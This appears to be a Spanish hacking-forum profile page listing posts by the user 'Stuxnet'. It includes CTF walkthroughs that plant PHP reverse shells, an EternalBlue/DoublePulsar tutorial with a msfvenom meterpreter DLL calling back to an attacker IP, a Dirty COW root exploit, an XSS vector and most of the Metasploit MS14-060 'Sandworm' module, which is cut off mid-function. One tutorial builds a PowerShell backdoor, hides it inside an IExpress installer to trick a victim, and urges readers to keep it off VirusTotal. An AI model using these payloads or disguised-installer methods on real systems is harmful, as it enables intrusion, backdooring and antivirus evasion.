Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - Stuxnet

Páginas: [1] 2 3 ... 7
1
Hacking / Tryhackme - Una nueva plataforma para enseñar y aprender hacking
« en: Noviembre 08, 2019, 01:42:11 pm »

Hola underc0de xD después de años sin publicar nada :v espero que no lo tomen como spam :3


La plataforma desarrolla aulas virtuales que no solo permiten a los usuarios implementar entornos de formación con solo hacer clic en un botón, sino también reforzar el aprendizaje mediante la adición de un enfoque de preguntas y respuestas. Es una experiencia cómoda para aprender mediante cursos prediseñados que incluyen máquinas virtuales (VM) hospedadas en la nube.

Mientras que el uso de un modelo de preguntas-respuesta hace que el aprendizaje sea más fácil, TryHackMe permite a los usuarios crear sus propias aulas virtuales para enseñar temas particulares que les permiten convertirse en profesores. Esto no sólo proporciona a otros usuarios contenido rico y variado, sino que también ayuda a los creadores a reforzar su comprensión de los conceptos fundamentales.

TryHackMe es muy adecuado para cualquier tipo de CTF, talleres y evaluaciones de formación, la plataforma está siendo utilizada por un concurso de la Universidad del Reino Unido llamado "HackBack", sólo una de las 12 universidades diferentes que TryHackMe ha participado!

Los concursos se centran en varias categorías de seguridad, entre ellas:

  • Explotación Web
    Forense
    OSINT
    Scripting
    Redes
    Ingeniería inversa

Algunas organizaciones privadas están utilizando la plataforma para evaluar a los entrevistados sobre su capacidad y para ayudarles a poner en la lista blanca a los empleados potenciales.

Completar las salas contribuye a completar "Objetivos", que son objetivos establecidos por TryHackMe. Por ejemplo, algunas salas pueden ayudar a prepararse para el examen OSCP.

tryhackme

Porque tryhackme y no hack the box (Que es otra excelente opción) Pues como menciono en el post lo que busca es que usuarios nuevos aprendan desde lo basico.


PD: Un saludo para todo los que conocen ): los extraño ..... xD

2
Off Topic / Ekoparty
« en: Septiembre 24, 2017, 02:07:56 pm »
Bien, este año me ire para la eko, asi que por si alguien más va y se pueda cuadrar un almuerzo o algunos retos sería perfecto.

telegram: @Stuxnet

Un saludo.


3
Soluciones de Wargames / hackfest2016: Quaoar - [ Walkthrough ]
« en: Julio 19, 2017, 12:12:45 pm »

En este tutorial vamos a resolver la maquina virtual hackfest2016: Quaoar la cual la pueden descargar desde vulnhub.

Viendo la descripción de la maquina virtual pide que encontremos 3 flags.

Código: Text
  1. There are 3 flags on this machine
  2.  
  3. 1. Get a shell
  4. 2. Get root access
  5. 3. There is a post exploitation flag on the box

Código: Text
  1. Laboratorio:
  2. Atacante Kali: 192.168.1.100
  3. Victima Quaoar: 192.168.1.101

Escaneo:


Como vemos tenemos un apache corriendo en el 80.


Buscando directorios con nmap


Genial tenemos un wordpress. Ahora le pasare un scanner conocido como cmsmap


Al poco tiempo del scaneo nos mostrará que el sitio esta utilizando contraseñas por defecto que serian admin:admin así que vamos a omitir cualquier explotación de vulnerabilidades web y obtendremos acceso al equipo mediante una reverse shell en php.

Ingresando al administrador del blog

Código: Text
  1. user: admin
  2. password:admin

Una vez echo esto, nos vamos al appearance --> editor  --> 404.php, la página 404 es la que tendra la reverse shell que voy a utilizar que será una de pentestmonkey.


Procedemos a modificar la reverse shell.

Código: Text
  1. $ip = '127.0.0.1';  // CHANGE THIS
  2. $port = 1234;       // CHANGE THIS

IP Atacante: 192.168.1.100
Por: lo dejare por defecto.

Ahora pondremos a la escucha nuestro netcat

Código: Text
  1. nc -v -n -l -p 1234

Al ingresar a la dirección de la página 404 obtendremos acceso al sistema, la url seria http://192.168.1.101/wordpress/wp-content/themes/twentyfourteen/404.php. twentyfourteen es el theme que se esta utilizando en el sitio.


Flag: 1. Get a shell


Con el comando locate voy a buscar el archivo flag.txt, al hacer eso nos dice que se encuentra en la carpeta /home/wpadmin/, después solo vere su contenido con el comando cat.

Flag 2. Get root access

Como el sitio esta en wordpress se me ocurrio hacerle un cat al archivo wp-config.php muchas veces colocan por ahi la password root


Genial la contraseña es: rootpassword!

Ahora voy a obtener una bash con el siguiente comando.

Código: Text
  1. python -c 'import pty;pty.spawn("/bin/bash")'


Yeaaa! como podemos ver, en la carpeta root se encuentra la segunda flag.

Flag 3. There is a post exploitation flag on the box.

Sin duda esta fué la que me tomo más tiempo, para encontra esta flag utilice de recurso Linux Post Exploitation Command List después de un rato leyendo el repositorio hago un cat sobre  /etc/crontab

Código: Text
  1. Crontab es un simple archivo de texto que guarda una lista de comandos a ejecutar en un tiempo especificado por el usuario


Nada de flag ):, ahora me iré a ver la carperta cron.d en el directorio etc.


Fuck yea! Al hacerle un cat al archivo php5 que se encontraba en la carpeta nos arroja información y un texto md5 cual es la ultima flag.

4
Wargames y retos / DevelReto
« en: Junio 18, 2017, 01:33:25 pm »
Hola comunidad aquí les dejo un pequeño reto que acabo de hacer, espero se diviertan esta muy entretenido, cualquier duda me hablan por mensaje. Y la solución me la envian por privado saludos.

https://mega.nz/#!oxwj1SLT!xqlmt-2MLjpbnPuGqDGhgv7ggqH31MTVzz91NDIy-QA

5
Hacking / Hackeando como la nsa
« en: Abril 23, 2017, 04:41:28 pm »

Buenas en este pequeño post, explotaremos una vulnerabilidad de Ejecución de codigo remoto en smb de windows descubierta por la nsa.
Desde hace unos días el grupo shadowbroker ha liberado nuevos exploits que afectan windows, SWIFT etc.

Las vulnerabilidades en windows son las siguientes:


Requerimientos:

Kali linux - Atacante -- 192.168.1.100
Windows XP - Atacante -- 192.168.1.102
Windows 7  - Victima  -- 192.168.1.101

Fuzzbunch ha sido el nombre de este framework con los multiples exploits de windows "El mestasploit de la nsa". Programado en python 2.6  y utiliza una versión antigua de pywin32.

Montando nuestro laboratorio.

En windows XP instalamos python 2.6 https://www.python.org/download/releases/2.6/ recomiendo moficar el path con la ruta de la carpeta de python2.6, la version antigua de pywin32 https://sourceforge.net/projects/pywin32/files y ahora descargamos el leak de exploits. https://github.com/misterch0c/shadowbroker

Nos enfocamos en la carpeta windows y procederemos a modificar Fuzzbunch.xml Linea 19 y linea 24 colocaremos la ruta de la carpeta de Resources en mi caso C:\nsa\shadowbroker\windows\Resources y la de Logs en la 24 C:\nsa\shadowbroker\windows\Logs.

Ahora vamos a editar fb.py comentando las lineas 26 y 72 o si no quieren comentar unicamente creen una carpeta con el nombre listeningposts dentro de la carpeta windows.

Bien ahora desde cmd nos ubicamos en la carpeta windows y ejecutamos: python fb.py



Primero pondremos la Ip victima.
Segundo pondremos la ip atacante windows xp
Tercero pondremos no en redireccion.



Bien despues precionamos enter, y procedemos a crear un proyecto nuevo con el nombre de underc0de.



Bien ahora vamos a usar el comando "use" para ver todo el arsenal de Fuzzbunch



Bien, usaremos el exploit "EternalBlue"



Bien, ahora procedemos a dejar todo por defecto, precionando enter.



Hasta llegar a esta parte donde vamos a cambiar la opcion 0 por 1



Bien ahora seguiremos precionando enter, y si todo salio bien.



Fuuuuuuuuuuuuck yea!!! Exploiting con exito.

Bien ahora usaremos otro genial función de Fuzzbunch DoublePulsar, para inyectar remotamente una DLL maliciosa, para eso la vamos a generar con msfvenom.

Código: Text
  1. msfvenom --platform Windows -p windows/meterpreter/reverse_tcp --arch x86 -f dll LHOST=192.168.1.100 LPORT=4444 > /root/nsa.dll

Nota: La dll se genero para la plataforma de windows x86

Ahora configuramos nuestro handler en metasploit.



Bien ahora copiamos nuestra dll a windows xp y ejecutamos lo siguiente



En mi caso dejare todo por defecto porque tengo la arquitectura x86
Bien ahora en este caso vamos a elejir la opcion 2 y luego nos pedira la ruta de nuestra dll.



Bien ahora, como siempre todo por defecto precionando enter, y si todo salio perfectamente les saldria esto



y en metasploit



fuck yeaaa!!! Sesion meterpreter sobre windows sin intervencion del usuario.

Recomendaciones.

Actualizar su sistema.

6
Bugs y Exploits / Dirty COW: Elevación de Privilegios en Linux
« en: Octubre 28, 2016, 01:15:01 pm »

Hace unos dias el investigador Phil Oester dio a conocer la vulnerabilidad Dirty COW (copy on write) la cual nos permite elevar privilegios en sistemas linux en otras palabras, un usuario local sin privilegios podría utilizar esta vulnerabilidad para escribir y tener acceso a partes del sistema que son de otros usuarios, incluido el root.


Ya existe un exploit público en exploit-db para poder explotar dicha aprovecha. Aparte en Github se ha montado un repositorio sobre todas las pruebas de concepto. 

PoC: Exploit DirtyCOW (Ubuntu 14.04 y Ubuntu 15.10)

Comprobación de versión del Kernel con el comando uname -a

Ubuntu 14.04

Ubuntu 15.10


Una vez descargado el exploit procedemos a comentar el payload generado con msfvenom, si estamos en un sistema x86, debemos comentar el payload  para x64 y si nos encontramos en un sistema x64 seria al revés.


Compilando el exploit, esta escrito en C.

Código: Text
  1. gcc 40616.c -o 40616 -pthread

Ahora ejecutamos.

Código: Text
  1. ./40616

Elevación a usuario root en Ubuntu 14.04

Elevación a usuario root en Ubuntu 15.10

Bytes:3

7
Soluciones de Wargames / Completando CTF Mr. Robot
« en: Agosto 30, 2016, 02:23:38 am »

Hola, hace tiempos sin postear nada y vi que cnfs realizo write-up de un ctf, haré lo mismo un pequeño reto que me colocaron en la empresa sin poder utilizar metasploit :c ok, el cual me saco las canas verdes un rato.

Mr. Robot CTF: https://www.vulnhub.com/entry/mr-robot-1,151/

  • Comenzando, hice un simple escaneo a la dirección 192.168.1.101 donde lo tengo montado.[/li]



    Como vemos el puerto 80 y el 443 están abiertos y el 22 cerrado.

    Entramos a la direccion de la maquina victima, y nos mostrava esto :c sin links así que 0 vul que testear xD :c



    Lo siguiente que realize fué buscar arhivos en el servidor para esto utilize la herramienta dirb, después de un rato de espera tenemos resultado

    Genial un wordpress :3



  • y los robots.txt[/li]



    Primero le veremos los robots.txt



    Genial, tenemos la 1 key de 3 :3 aparte de esto hay un diccionario que nos servira mucho :3

    Como ya se que es un wordpress utilizare la herramienta CMSmap :3 para ver si tiene algun fallo ha explotar



    No fué mucho lo que obtuve :c solo esta parte intersante el cual nos permitia enumerar usuarios a través de un forgotten password.

  • Enumerando Usuarios.[/li][/list]

    Para esto vamos a usar el diccionario que encontramos en robots.txt haciendo un poco de fuzzing con zap

    Zed Attack Proxy (ZAP) es una herramienta proveniente del Proyecto OWASP para realizar tests de penetración en aplicaciones web.
    Zap ya esta incluida por defecto en Kali Linux asi que solo basta con ejectutar en consola zaproxy en consola. Ahora configuramos nuestro proxy nuestro navegador.

    Nuestro ataque será dirigido hacía la ruta 192.168.1.101/wp-login
    Login: Devel
    Password: develsecurity



    Nos devuelve la siguiente respuesta en el zaproxy, seleccionamos la respuesta que sería devel, click derecho y seleccionamos la opción de fuzz.
    Para realizar la opción de fuzz utilizare un diccionario de robots.txt.



    Seleccionamos Añadir, y luego Start Fuzzer

    Al revisar la respuesta claramente nos dice que el usuario es invalido.



    Como vemos nos marca con un Reflected, y revisando la respuesta nos damos cuenta que nos dice contraseña invalida para el usuario Elliot. Hemos encontrado nuestro usuario.



  • Ataque de Fuerza Bruta.[/li][/list]

    Siempre utilizando el diccionario y cmsmap haré un ataque de fuerza bruta, solo que ahora para ahorra tiempo lo acortaremos un poco con la herramienta sort de la siguiente manera. (Gracias a cierto miembro de la empresa por el tip)

    cat fsocity.dic | wc -l
    sort -u fsocity.dic | wc -l
    sort -u fsocity.dic > fsocity.small.dic

    Ahora utilizamos CMSmap.



    -u = El nombre de usario en nuestro caso sería Elliot
    -p = passwords, el path de nuestro wordlist.
    Listo luego de un tiempo CMSmap completa su trabajo.

    Ahora utilizando las credenciales obtenidas:




    Listo estamos dentro, :3 ahora solo falta tener un shell inversa en el host :c jaja como regla era no usar metasploit así que me recorde que anteriores ctf un amigo me recomendo shells de http://pentestmonkey.net/tools/web-shells/php-reverse-shell

    Así que descargamos y configuramos

    $ip = '127.0.0.1';  // CHANGE THIS (IP Atacante en nuestro caso 192.168.1.100)
    $port = 1234;       // CHANGE THIS

    y en consola pondremos a la escucha netcat: nc -v -n -l -p 1234

    Ahora vamos a editar la página de error 404 copiando el codigo de nuestra shell :3



    Ahora ingresamos a la direccion de nuestra shell http://192.168.1.101/404.php



    Listo :3 estamos dentro ahora solo nos movemos para el /home/robot



    :C bueno aqui fué la parte donde me salieron canas verdes, necesitava una terminal :c contacte con quien me recomendo la php shell y me dijo que en la misma página se encontraba esto: http://pentestmonkey.net/blog/post-exploitation-without-a-tty , asi que para llamar a la terminal utilizare python -c ‘import pty; pty.spawn(“/bin/sh”)’



    :3 listo tenemos nuestra terminal :3 pero el problema sigue, la key 2 pertenese al usuario robot y nosotros estamos como daemon, pero hay otro archivo intresante el password.raw-md5



    robot:c3fcd3d76192e4007dfb496cca67e13b

    Usuario y contraseña como vemos es un md5 y si lo colocamos en google :3 abcdefghijklmnopqrstuvwxyz , ahora ejecutamos su robot



    Ahora si podemos hacer un cat de la segunda key :3



    solo una mas y pwned, para lo siguiente un par de cervezas y cigarros xD, el ultimo flag no lo pude resolver, no encontre como elevar privilegios :c. Les dare la solución que hizo un miembro de la empreza, primero ejecuta nmap, al ver que este estava instalado uso la opción --interactive y luego ejecuto !sh,

    Esta opción nos permite ejecutar una terminal como root y bum key 3 :3



    Agradecimiento al team DevelSecurity.


8
Hacking / Atacando Windows 8.1 Pro con Harness
« en: Diciembre 20, 2015, 08:45:58 pm »

Saludos amigos en este pequeño tutorial atacaremos un sistema windows 8.1 x86 con la herramienta harness.


Harness fue presentada en la DEFCON23 esta tool nos permite generar payload de acceso remoto con la capacidad de proporcioanar una interfaz de control remoto de powershell.

Vamos a ello.

Clonamos el proyecto desde Github

Código: [Seleccionar]
git clone [url]https://github.com/rich5/Harness[/url]
Para la instalacion de la herramienta ejecutaremos los siguientes comandos.

Código: [Seleccionar]
cd Harness
chmod 755 python_install.sh
./python_install.sh

Código: [Seleccionar]
wget [url]http://python.org/ftp/python/3.4.3/Python-3.4.3.tar.xz[/url]
tar xf Python-3.4.3.tar.xz
cd Python-3.4.3
./configure --prefix=/usr/local --enable-shared LDFLAGS="-Wl,-rpath /usr/local/lib"
make && make altinstall


Tambien se ha corregido el bug con el autocompletado, para eso ejecuta los siguientes comando

Código: [Seleccionar]
apt-get install libssl-dev openssl
apt-get install python3-pip
apt-get install libcurses5-dev
pip3 install readline
python_install.sh

Ahora si stuxnet atack !!! xD

Ejecutamos harness de la siguiente manera

Código: [Seleccionar]
python3.4 harness.py

Ahora listaremos los módulos de la tool de la siguiente manera

Código: [Seleccionar]
show modules

En este caso usare el ultimo payload ya que el windows que atacare es x86, para eso lo cargaremos de la siguiente manera.

Código: [Seleccionar]
load payloads/TCP/x86/exe/Harness_x86
y para ver sus opciones

Código: [Seleccionar]
show options

Ahora procederemos a configurarlo, IP = su ip y PORT el puerto que usaran en mi caso usare el 4444


ahora ya configurado todo ejecutamos el comando run y nos preguntara un nombre en mi caso underc0de.exe, se guardara en la carpeta de harness.


Ahora ejecutamos el comando back y procederemos a configurar el handler


Código: [Seleccionar]
load handlers/PSHandler
ahora lo procederemos a configurarlo

IP = Su IP
PORT = su puerto
SSL = false


Ahora si ejecutamos run y tendremos en escucha nuestro handler xD ahora es hora de hacer un poco de ingeniería social y les mostrare un pequeño método.


IExpress, creador de instaladores :3

Esta tool es nativa desde windows XP que nos permite crear archivos comprimidos y autoinstaladores.

Para esto utilizaremos cualquier aplicación que deseemos, en mi caso utilizare YUMI una simple tool para crear usb boteables y el backdoor


y ahora el tipico siguiente


En esta parte nos pedirá agregar las dos aplicaciones que deseamos :3


y ahora siguiente y configuramos de la siguiente manera para que el backdoor se ejecute en segundo plano


Luego en siguiente y dejamos esto asi


y le ahora siguiente  nos preguntara donde queremos guardar y luego terminar :3 y se genera nuestro autoinstalador para pasarselo a la victima


Ahora cuando nuestra victima ejecute el programa se abrira la aplicación de YUMI y por debajo el backdoor asi dando nuestra session de powershell !!!!


ahora ejecutamos para ver nuestras sesiones

Código: [Seleccionar]
show sessions

Para interactuar con nuestra sesión lo hacemos de la siguiente forma y Fuegoooo en la cocinaa :3 lo que pase después esta en su imaginación.

Código: [Seleccionar]
session 1


Nota: No subaan nada a virustotaaal no quemen esta maravillosa herramienta aun en desarrollo

Bytes:


9
Seguridad Wireless / OWISAM (Open Wireless Security Assessment Methodology)
« en: Diciembre 19, 2015, 11:17:50 am »

Hace tiempos que no publicaba nada por aquí asi que hoy les vengo hablar un poco sobre OWISAM (Open Wireless Security Assessment Methodology) esta metodología fue presentada en la RootedCON en el año 2013 por Andrés Tarasco y Miguel Tarasco. Es una metodología abierta para el análisis de seguridad Wireless.

La metodología de seguridad OWISAM define un total de 64 controles técnicos, agrupados en 10 categorías, que especifican un conjunto de pruebas necesarias para garantizar con éxito una auditoría de seguridad sobre una infraestructura inalámbrica

El OWISAM Top 10, que define los principales riesgos de seguridad en las redes inalámbricas se ha consolidado y definido:

Citar
    OWISAM-TR-001: Red de comunicaciones Wi-Fi abierta.
    OWISAM-TR-002: Presencia de cifrado WEP en redes de comunicaciones.
    OWISAM-TR-003: Algoritmo de generación de claves del dispositivo inseguro (contraseñas y WPS).
    OWISAM-TR-004: Clave WEP/WPA/WPA2 basada en diccionario.
    OWISAM-TR-005: Mecanismos de autenticación inseguros (LEAP,PEAP-MD5,..)
    OWISAM-TR-006: Dispositivo con soporte de Wi-Fi protected setup PIN activo (WPS).
    OWISAM-TR-007: Red Wi-Fi no autorizada por la organización.
    OWISAM-TR-008: Portal hotspot inseguro.
    OWISAM-TR-009: Cliente intentando conectar a red insegura.
    OWISAM-TR-010: Rango de cobertura de la red demasiado extenso.

Pueden ver el video de la presentación


Referencias:

http://www.dragonjar.org/como-iniciar-en-seguridad-informatica-hacking-etico.xhtml
https://www.owisam.org/es/OWISAM_Top_10
http://www.slideshare.net/rootedcon/andrs-tarasco-y-miguel-tarasco-owisam-open-wireless-security-assessment-methodology-rooted-con-2013

10
Hacking ShowOff / [DOM Based XSS] cybercamp.es
« en: Julio 15, 2015, 11:14:30 am »

url: https://cybercamp.es/#prettyPhoto/0
vector: ,<img src=x onerror=alert(document.domain)>/
Reportada y fixeada.

11
Hacking / Stegosploit - Ejecutando Codigo en Imagenes
« en: Junio 09, 2015, 03:46:19 pm »

En la pasada Hack In The Box Security Conference que se realiza en Amsterdam, el investigador Saumil Shah  presento Stegosploit, la técnica permite a los hackers esconder código malicioso dentro de los píxeles de una imagen.

Cuando se usa la esteganografía en imágenes es probable que la imagen original se vea alterada y esto sea un síntoma de que ha sufrido una modificación. A continuación se  muestra un ejemplo usado por el investigador donde se observa estas alteraciones:


Saumil ha usado una técnica que le permite ocultar el código en aquellos bits menos significativos de los valores RGB de una imagen de forma que las alteraciones producidas al introducir código en ellas son prácticamente imperceptibles.

Demos:




Presentacion:


12
Hacking / The Pentesters Framework
« en: Junio 08, 2015, 04:14:02 pm »

Como siempre Trusred Sec sorprendiendonos con su trabajo, en esta ocación  han liberado un nuevo proyecto llamado The Pentesters Framework, La idea de este framework es reunir una serie de herramientas relacionadas con el pentesting y proporcionar al pentester la posibilidad de tener las herramientas actualizadas y al alcance una serie de comandos.


Este Framework cuenta con modulos para:


Entre sus herramientas podemos encontrar,  beef, sqlmap, Unicorn y MeterSSH, SET entre muchos mas.

Descargamos el proyecto desde git

Código: [Seleccionar]
git clone [url]https://github.com/trustedsec/ptf[/url]
Para ver sus modulos tecleamos:

Código: [Seleccionar]
show modules

Ahora vamos a usar un modulo en mi caso instalare, metershh.

Código: [Seleccionar]
use modules/post-exploitation/metershh

Ahora unicamente tecleamos run:



13
Off Topic / Happy Hack!
« en: Diciembre 23, 2014, 11:16:31 am »

Adelanto el post porque mañana no andare en condiciones muy buenas para hacerlo jajaja xD, asi que todo con moderación.

Les deseo unas felices fiestas en compañía de sus seres queridos, y que su hacking sea de lo mejor xD :3 siempre es bueno hacer una travesura antes de salir a disfrutar.

14
Hacking / El Cartero llegó a la ekoparty
« en: Octubre 30, 2014, 03:57:00 pm »

Como todos sabran en estas fechas se esta celebrando el evento de seguridad informática en latinoamérica, La Ekoparty, el fundador de Section9Labs, Matias P. Brutti, ha mostrado una herramienta de automatización para utilizar en lo que respecta a pruebas de intrusión mediante técnicas de Ingeniería Social. La herramienta, conocida como Cartero, se encarga de hacer envíos de correos adjuntando códigos maliciosos creados con Msfvenom y VeilEvasion; clonado de sitios web para phishing y envío de mensajes de texto.

Esta herramienta es un framework de Ingeniería Social, que cubre la etapa de ataque y explotación de vulnerabilidades. Haciendo uso del envío de correos personalizados, el atacante puede enviar correos electrónicos simulando ser (por ejemplo) un compañero de trabajo dentro de la organización, como también un superior. De esta forma, puede enviar un mensaje solicitando a los empleados que prueben un determinado servicio clonado con la misma herramienta, para producir el robo de esta información.

Según su creador, fue desarrollada solo para plataformas OS X y Linux, lo que significa que no se encuentra disponible para versiones Windows. Sin embargo, resaltó que al ser una aplicación creada en Ruby, podría ejecutarse sin problemas en entornos Windows. Seguido de esto invitó a quienes quieran, a migrarla a la plataforma de Microsoft. En su sitio en Github podrán encontrar las dependencias que la aplicación requiere instalar, junto con las instrucciones para hacerlo.

Referencia:

http://www.welivesecurity.com/la-es/2014/10/30/cartero-llego-ekoparty/

15
Off Topic / Feliz Cumple LucaSthefano
« en: Octubre 25, 2014, 11:46:05 am »

Feliz cumple crack, pasatela bien. Disfruta mucho las drogras, la cerveza y las putas xD

Bytes ::)

16

Una nueva vulnerabilidad reconocida ayer por Microsoft puede permitir la ejecución de códigos remotos. Esta vulnerabilidad, conocida como CVE-2014-6352 aún no ha sido parcheada de forma definitiva, y todas las versiones de Windows (excepto Windows Server 2003) son vulnerables aunque existan work arounds que detallaremos en este post.

Microsoft ha reconocido que ya está al tanto de ataques dirigidos en los cuales atacantes explotan esta vulnerabilidad a través de objetos OLE en presentaciones de Power Point.

La falla está presente en el mecanismo OLE de Windows. OLE, Object Link and Embedding, fue desarrollado por Microsoft y tiene muchas funcionalidades, pero básicamente permite que elementos u objetos de distintos formatos ubicados en distintas rutas sean utilizados por varios programas. Un buen ejemplo es un texto escrito en Word que contiene hojas de cálculo de Excel, figuras y/o fotos, entre otros; que originalmente se encuentran en otras rutas puedan ser accedidas en el texto gracias al hecho de estar incrustados o embebidos en el mismo.

Un atacante tendría que utilizar la Ingeniería Social para convencer la víctima a acceder un sitio específico y hacer clic en un objeto infectado. Es importante destacar que esta vulnerabilidad solamente puede ser explotada si el usuario hace clic en un objeto infectado.

Este es el modulo de metasploit, con el que puden explotar esta vulnerabilidad.

Lo guardan con el nombre de: ms14_060_sandworm.rb y luego lo copian a su carpeta: ruta_metasploit/exploit/windows/fileformat

Código: Ruby
  1. ##
  2. # This module requires Metasploit: http//metasploit.com/download
  3. # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
  4. ##
  5.  
  6. require 'msf/core'
  7.  
  8. class Metasploit3 < Msf::Exploit::Remote
  9.   Rank = ExcellentRanking
  10.  
  11.   include Msf::Exploit::FILEFORMAT
  12.   include Msf::Exploit::EXE
  13.  
  14.   def initialize(info={})
  15.     super(update_info(info,
  16.       'Name'           => "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
  17.       'Description'    => %q{
  18.         This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
  19.         allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
  20.         Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
  21.         vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
  22.         running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
  23.         as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to
  24.         a failure in the CPackage::CreateTempFileName function.
  25.  
  26.         This module will generate three files: an INF, a GIF, and a PPSX file. You are required to
  27.         set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an
  28.         older version of Winodws (such as XP) work best for this because they require little
  29.         configuration to get going. The PPSX file is what you should send to your target.
  30.  
  31.         In detail, the vulnerability has to do with how the Object Packager 2 component
  32.         (packager.dll) handles an INF file that contains malicious registry changes, which may be
  33.         leveraged for code execution. First of all, Packager does not load the INF file directly.
  34.         But as an attacker, you can trick it to load your INF anyway by embedding the file path as
  35.         a remote share in an OLE object. The packager will then treat it as a type of media file,
  36.         and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will
  37.         download it with a CopyFileW call, save it in a temp folder, and pass that information for
  38.         later. The exploit will do this loading process twice: first for a fake gif file that's
  39.        actually the payload, and the second for the INF file.
  40.  
  41.        The packager will also look at each OLE object's XML Presentation Command, specifically the
  42.         type and cmd property. In the exploit, "verb" media command type is used, and this triggers
  43.         the packager!CPackage::DoVerb function. Also, "-3" is used as the fake gif file's cmd
  44.        property, and "3" is used for the INF. When the cmd is "-3", DoVerb will bail. But when "3"
  45.        is used (again, for the INF file), it will cause the packager to try to find appropriate
  46.        handler for it, which will end up with C:\Windows\System32\infDefaultInstall.exe, and that
  47.        will install/run the malicious INF file, and finally give us arbitrary code execution.
  48.      },
  49.      'License'        => MSF_LICENSE,
  50.      'Author'         =>
  51.        [
  52.          'Unknown', # Vulnerability discovery
  53.          'sinn3r', # Metasploit module
  54.          'juan vazquez' # Metasploit module
  55.        ],
  56.      'References'     =>
  57.        [
  58.          ['CVE', '2014-4114'],
  59.          ['OSVDB', '113140'],
  60.          ['MSB', 'MS14-060'],
  61.          ['BID', '70419'],
  62.          ['URL' , '[url]http://www.isightpartners.com/2014/10/cve-2014-4114/[/url]'],
  63.          ['URL', '[url]http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/[/url]'],
  64.          ['URL', '[url]http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/[/url]']
  65.        ],
  66.      'Payload'        =>
  67.        {
  68.          'Space'       => 2048,
  69.          'DisableNops' => true
  70.        },
  71.      'Platform'       => 'win',
  72.      'Arch'           => ARCH_X86,
  73.      'Targets'        =>
  74.        [
  75.          ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
  76.        ],
  77.      'Privileged'     => false,
  78.      'DisclosureDate' => "Oct 14 2014",
  79.      'DefaultTarget'  => 0))
  80.  
  81.    register_options(
  82.      [
  83.        OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']),
  84.        OptString.new('UNCPATH', [ true, 'The UNC folder to use (Ex: \\\\192.168.1.1\\share)' ])
  85.      ], self.class)
  86.  end
  87.  
  88.  def exploit
  89.    @unc = validate_unc_path
  90.  
  91.    if @unc.nil?
  92.      fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder")
  93.    end
  94.  
  95.    print_status("Creating the EXE payload...")
  96.    payload_name = "#{rand_text_alpha(4)}.gif"
  97.    p = generate_payload_exe
  98.  
  99.    print_status("Creating the INF file...")
  100.    inf_name = "#{rand_text_alpha(4)}.inf"
  101.    inf = inf_file(payload_name)
  102.  
  103.    print_status("Creating '#{datastore['FILENAME']}' file ...")
  104.     exe_stream = ole_exe(payload_name)
  105.     inf_stream = ole_inf(inf_name)
  106.     zip = zip_ppsx(exe_stream, inf_stream)
  107.     file_create(zip)
  108.  
  109.     payload_path = my_file_create(p, payload_name)
  110.     print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}")
  111.  
  112.     inf_path = my_file_create(inf, inf_name)
  113.     print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}")
  114.   end
  115.  
  116.   def validate_unc_path
  117.     if datastore['UNCPATH'] =~ /^\\{2}[[:print:]]+\\[[:print:]]+\\*$/
  118.       unc = datastore['UNCPATH']
  119.     else
  120.       unc = nil
  121.     end
  122.  
  123.     unc
  124.   end
  125.  
  126.   def my_file_create(data, name)
  127.     ltype = "exploit.fileformat.#{self.shortname}"
  128.     path = store_local(ltype, nil, data, name)
  129.  
  130.     path
  131.   end
  132.  
  133.   def zip_ppsx(ole_exe, ole_inf)
  134.     zip_data = {}
  135.     data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
  136.  
  137.     Dir["#{data_dir}/**/**"].each do |file|
  138.       unless File.directory?(file)
  139.         zip_data[file.sub(data_dir,'')] = File.read(file)
  140.       end
  141.     end
  142.  
  143.     # add the otherwise skipped "hidden" file
  144.     file = "#{data_dir}/_rels/.rels"
  145.     zip_data[file.sub(data_dir,'')] = File.read(file)
  146.  
  147.     # put our own OLE streams
  148.     zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe
  149.     zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf
  150.  
  151.     # create the ppsx
  152.     ppsx = Rex::Zip::Archive.new
  153.     zip_data.each_pair do |k,v|
  154.       ppsx.add_file(k,v)
  155.     end
  156.  
  157.     ppsx.pack
  158.   end
  159.  
  160.   def ole_inf(file_name)
  161.     content = "EmbeddedStg2.txt\x00"
  162.     content << "#{@unc}\\#{file_name}\x00"
  163.  
  164.     data = [content.length].pack('V')
  165.     data << content
  166.     ole = create_ole("\x01OLE10Native", data)
  167.  
  168.     ole
  169.   end
  170.  
  171.   def ole_exe(file_name)
  172.     content = "EmbeddedStg1.txt\x00"
  173.     content << "#{@unc}\\#{file_name}\x00"
  174.  
  175.     data = [content.length].pack('V')
  176.     data << content
  177.  
  178.     ole = create_ole("\x01OLE10Native", data)
  179.  
  180.     ole
  181.   end
  182.  
  183.   def create_ole(stream_name, data)
  184.     ole_tmp = Rex::Quickfile.new('ole')
  185.     stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
  186.  
  187.     stm = stg.create_stream(stream_name)
  188.     stm << data
  189.     stm.close
  190.  
  191.     directory = stg.instance_variable_get(:@directory)
  192.     directory.each_entry do |entry|
  193.       if entry.instance_variable_get(:@_ab) == 'Root Entry'
  194.         # 02260200-0000-0000-c000-000000000046 # Video clip
